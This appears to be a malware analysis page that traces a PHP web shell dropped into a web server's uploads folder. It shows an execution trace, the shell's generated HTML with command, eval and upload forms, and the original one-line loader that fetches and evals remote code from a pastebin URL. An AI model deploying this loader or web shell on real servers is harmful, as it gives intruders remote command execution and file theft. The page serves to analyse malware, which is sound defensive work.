3 A /var/www/html/uploads/1.php(1) : eval()'d code 59 $owner['read'] = 'r'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 60 $owner['write'] = 'w'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 61 $owner['execute'] = 'x'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 62 $group['read'] = 'r'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 63 $group['write'] = 'w'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 64 $group['execute'] = 'x'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 65 $world['read'] = 'r'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 66 $world['write'] = 'w'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 67 $world['execute'] = 'x'
4 71 0 0.049273 445544 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 71 2 '%1s' 'd'
4 71 1 0.049287 445928
4 71 R 'd'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 71 $s = 'd'
4 72 0 0.049310 445864 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 72 4 '%1s%1s%1s' 'r' 'w' 'x'
4 72 1 0.049326 446248
4 72 R 'rwx'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 72 $s .= 'rwx'
4 73 0 0.049349 445576 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 73 4 '%1s%1s%1s' 'r' 'w' 'x'
4 73 1 0.049364 445960
4 73 R 'rwx'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 73 $s .= 'rwx'
4 74 0 0.049386 445576 sprintf 0 /var/www/html/uploads/1.php(1) : eval()'d code 74 4 '%1s%1s%1s' 'r' 'w' 'x'
4 74 1 0.049401 445960
4 74 R 'rwx'
3 A /var/www/html/uploads/1.php(1) : eval()'d code 74 $s .= 'rwx'
3 69 1 0.049424 444456
3 69 R 'drwxrwxrwx'
2 5 1 0.049440 444224
1 3 1 0.049451 417432
0.049487 336992
TRACE END [2023-02-12 22:25:36.169456]
Generated HTML code
<html><head></head><body>1 2
<!-- Latest compiled and minified CSS -->
<link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css">
<!-- jQuery library -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.2/jquery.min.js"></script>
<!-- Latest compiled JavaScript -->
<script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js"></script>
<style>
.btn-link {
border: none;
outline: none;
background: none;
cursor: pointer;
color: #0000EE;
padding: 0;
text-decoration: underline;
font-family: inherit;
font-size: inherit;
}
</style>
<div class="container">
<h2>Viewing directory /var/www/html</h2>
<br><form action="/1.php" method="POST"><input type="hidden" name="dir" value="/var/www/html"><input type="text" name="cmd" size="120" autocomplete="off" autofocus="">
<input type="submit" value="Run"><br>
<input type="text" name="eval" size="120" autocomplete="off" autofocus="">
<input type="submit" value="Execute">
</form>
<br>
<div class="navbar-form"><form action="/1.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="dir" value=""> <input type="file" name="fileToUpload" id="fileToUpload">
<br><input type="submit" value="Upload File" name="submit"></form></div><br>
<table class="table table-hover table-bordered">
<thead>
<tr>
<th>Name</th>
<th>Owner</th>
<th>Permissions</th>
</tr>
</thead>
<tbody>
<tr><td><button type="submit" name="dir" value="/var/www/html" class="btn-link">.</button></td><td>root</td><td> drwxrwxrwx</td>
</tr><form action="/1.php" method="POST"></form><tr><td><button type="submit" name="dir" value="/var/www" class="btn-link">..</button></td><td>root</td><td> drwxrwxrwx</td>
</tr><form action="/1.php" method="POST"></form><tr><td><button type="submit" name="download" value="/var/www/html/1.php" class="btn-link">1.php</button></td><td>osboxes</td><td> drwxrwxrwx</td>
</tr><form action="/1.php" method="POST"></form><tr><td><button type="submit" name="download" value="/var/www/html/beneri.se_malware_analysis" class="btn-link">beneri.se_malware_analysis</button></td><td>root</td><td> drwxrwxrwx</td>
</tr></tbody></table>
</div>
4 5 6 7 8 9 10 11 12 13 14 15
save as php file</body></html>Original PHP code
1 2 <?php eval("?>".file_get_contents("https://pastebin.com/raw/1bqzuGb7"));?> 4 5 6 7 8 9 10 11 12 13 14 15
save as php file